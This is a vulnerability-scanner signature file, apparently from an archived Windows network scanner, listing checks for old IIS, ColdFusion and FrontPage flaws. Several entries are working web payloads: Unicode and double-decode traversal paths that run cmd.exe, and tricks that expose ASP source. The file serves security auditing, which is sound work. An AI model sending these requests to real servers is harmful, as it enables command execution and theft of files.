home *** CD-ROM | disk | FTP | other *** search
/ Steganos Hacker Tools / SHT151.iso / programme / scanner / lannetscan / lannetscan.exe / data1.cab / Program_Files / Alerts / CGI_Abuses / iis.txt < prev    next >
Encoding:
Text File  |  2001-09-25  |  4.0 KB  |  161 lines
  1. RDS exploit (msadcs.dll) RFP9902
  2. 0,Run arbitrary commands (SYSTEM level privileges)
  3. HEAD
  4. msadcs.dll
  5. msadc
  6.  
  7. 529
  8. #-----------------------------------------------------------
  9. Escaped Characters Decoding Bug
  10. 0,Run arbitrary commands (IUSR_machinename level privileges)
  11. GET
  12. ..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
  13. scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
  14. DIRECTORY OF
  15. 2708
  16. #-----------------------------------------------------------
  17. Unicode Directory Transversal Bug
  18. 0,Run arbitrary commands (IUSR_machinename level privileges)
  19. GET
  20. ..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
  21. scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
  22. DIRECTORY OF
  23. 1806
  24. #-----------------------------------------------------------
  25. Unicode Directory Transversal Bug (2)
  26. 0,Run arbitrary commands (IUSR_machinename level privileges)
  27. GET
  28. ..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
  29. scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
  30. DIRECTORY OF
  31. 1806
  32. #-----------------------------------------------------------
  33. Executable File Parsing Bug
  34. 0,Run arbitrary commands (IUSR_machinename level privileges)
  35. GET
  36. lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir
  37. scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
  38. DIRECTORY OF
  39. 1912
  40. #-----------------------------------------------------------
  41. .ida/.idq trick
  42. 2,posibility to guess physical paths
  43. HEAD
  44. lanscan.ida
  45. /
  46.  
  47.  
  48. #-----------------------------------------------------------
  49. .ida/.idq trick (2)
  50. 2,posibility to guess physical paths
  51. HEAD
  52. lanscan.idq
  53. /
  54.  
  55.  
  56. #-----------------------------------------------------------
  57. Cold Fusion check (1)
  58. 1,view any file (e.g. getfile.cfm?filename=c:\boot.ini)
  59. HEAD
  60. exampleapp/email/getfile.cfm
  61. cfdocs
  62.  
  63.  
  64. #-----------------------------------------------------------
  65. Cold Fusion check (2)
  66. 1,start/stop the server
  67. HEAD
  68. Administrator/startstop.html
  69. cfide
  70.  
  71.  
  72. #-----------------------------------------------------------
  73. Cold Fusion check (3)
  74. 1,run CF code or denial os service
  75. HEAD
  76. snippets/evaluate.cfm
  77. cfdocs
  78.  
  79.  
  80. #-----------------------------------------------------------
  81. Cold Fusion check (4)
  82. 2,verify the existance of files
  83. HEAD
  84. snippets/fileexists.cfm
  85. cfdocs
  86.  
  87.  
  88. #-----------------------------------------------------------
  89. Cold Fusion check (5)
  90. 1,view .cfm files
  91. HEAD
  92. snippets/viewexample.cfm
  93. cfdocs
  94.  
  95.  
  96. #-----------------------------------------------------------
  97. Cold Fusion check (6)
  98. 1,view any file
  99. HEAD
  100. exampleapp/docs/sourcewindow.cfm
  101. cfdocs
  102.  
  103.  
  104. #-----------------------------------------------------------
  105. Frontpage check (1)
  106. 3,Frontpage extensions are installed on this computer
  107. HEAD
  108. _vti_inf.html
  109. /
  110.  
  111.  
  112. #-----------------------------------------------------------
  113. Frontpage check (2)
  114. 1,Some versions of Frontpage are vulnerable to denial of service attacks
  115. HEAD
  116. shtml.exe
  117. _vti_bin
  118.  
  119. 1608
  120. #-----------------------------------------------------------
  121. Frontpage check (3)
  122. 1,Some versions of Frontpage are vulnerable to denial of service attacks
  123. HEAD
  124. shtml.dll
  125. _vti_bin
  126.  
  127. 1608
  128. #-----------------------------------------------------------
  129. Terminal Services
  130. 3,Terminal Services are installed on this computer
  131. HEAD
  132. tsweb
  133. /
  134.  
  135.  
  136. #-----------------------------------------------------------
  137. MS Visual Studio RAD Support Buffer Overflow
  138. 0,Run arbitrary commands (IUSR_SYSTEM level privileges)
  139. HEAD
  140. fp30reg.dll
  141. /_vti_bin/_vti_aut
  142.  
  143. 2906
  144. #-----------------------------------------------------------
  145. ASP source using ::$DATA trick
  146. 2,Retrive the source code of the remote ASP scripts
  147. GET
  148. default.asp::$DATA
  149. /
  150. CONTENT-TYPE: APPLICATION/OCTET-STREAM
  151. CVE-1999-0278
  152. #-----------------------------------------------------------
  153. ASP source using %2e trick
  154. 2,Retrieve the source code of remote ASP scripts
  155. GET
  156. default.asp%2e
  157. /
  158. CONTENT-TYPE: APPLICATION/OCTET-STREAM
  159. CAN-1999-0253
  160. #-----------------------------------------------------------
  161.